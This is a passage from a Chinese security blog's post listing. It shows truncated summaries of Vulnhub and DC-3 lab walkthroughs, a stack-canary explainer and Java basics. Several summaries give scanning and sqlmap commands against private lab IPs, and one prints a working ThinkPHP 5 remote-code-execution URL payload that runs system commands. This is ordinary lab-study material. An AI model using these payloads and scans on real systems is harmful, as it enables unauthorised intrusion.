摘要:信息收集 ./dirsearch.py --random-agents -u ‘http://192.168.17.142:8011/’ -e * 扫描目录 Bak泄露 John frank 登陆到development Uploader可以上传 先看8081 Api 成功 可以包含出apache的 阅读全文
posted @ 2020-02-03 22:45 轩x 阅读(47) 评论(0) 推荐(0) 编辑
摘要:CANNARY(栈保护) 这个选项表示栈保护功能有没有开启。 栈溢出保护是一种缓冲区溢出攻击缓解手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让shellcode能够得到执行。当启用栈保护后,函数开始执行的时候会先往栈里插入cookie信息,当函数真正返回的时候会验证cooki 阅读全文
posted @ 2020-02-02 15:59 轩x 阅读(245) 评论(0) 推荐(0) 编辑
摘要:信息收集 存在 http://192.168.17.139/m3diNf0/info.php http://192.168.17.139/se3reTdir777/ SQL注入测试 sqlmap -u "http://192.168.17.139/se3reTdir777/index.php" -- 阅读全文
posted @ 2020-01-29 20:47 轩x 阅读(66) 评论(0) 推荐(0) 编辑
摘要:DC-3 IP扫描 端口扫描 Nmap -A 192.168.17.138 信息采集 版本3.7.0 joomscan -u http://192.168.17.138/ kali自带工具 后台http://192.168.17.138/administrator/ CVE-2017-8917 sq 阅读全文
posted @ 2020-01-25 23:39 轩x 阅读(108) 评论(0) 推荐(0) 编辑
摘要:[ThinkPHP]5-Rce ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls [ThinkPHP]5.0.23-Rce ?s=captcha POST:_meth 阅读全文
posted @ 2020-01-23 21:18 轩x 阅读(81) 评论(0) 推荐(0) 编辑
摘要:ip扫描 Netdisvocer 端口扫描 nmap -A 80端口 drupal 7 服务 111端口 rpcbind服务 入侵靶机 CVE-2018-7600 Drupal核心远程代码执行漏洞 CVE-2018-7602 https://github.com/pimps/CVE-2018-760 阅读全文
posted @ 2020-01-22 23:26 轩x 阅读(76) 评论(0) 推荐(0) 编辑
摘要:Java 继承 public class Mouse extends Animal { public Mouse(String myName, int myid) { super(myName, myid); } } Super调用其中的一个构造函数 implements关键字 使用 impleme 阅读全文
posted @ 2020-01-21 23:33 轩x 阅读(48) 评论(0) 推荐(0) 编辑
摘要:public class StringDemo{ public static void main(String args[]){ char[] helloArray = { 'r', 'u', 'n', 'o', 'o', 'b'}; String helloString = new String( 阅读全文
posted @ 2020-01-20 23:50 轩x 阅读(58) 评论(0) 推荐(0) 编辑
摘要:Java 简介 面向对象、分布式、健壮、安全、中立、可移植多线程等 环境配置 https://blog.csdn.net/weixin_39310910/article/details/90024524 https://www.runoob.com/java/java-environment-set 阅读全文
posted @ 2020-01-19 23:59 轩x 阅读(46) 评论(0) 推荐(0) 编辑
摘要:Shuffle Vulnhub--LazySysAdmin https://www.vulnhub.com/entry/lazysysadmin-1,205/ 【渗透测试】 ip扫描 命令netdiscover 端口扫描 Nmap https://www.cnblogs.com/hongfei/p/ 阅读全文
posted @ 2020-01-18 22:58 轩x 阅读(137) 评论(0) 推荐(0) 编辑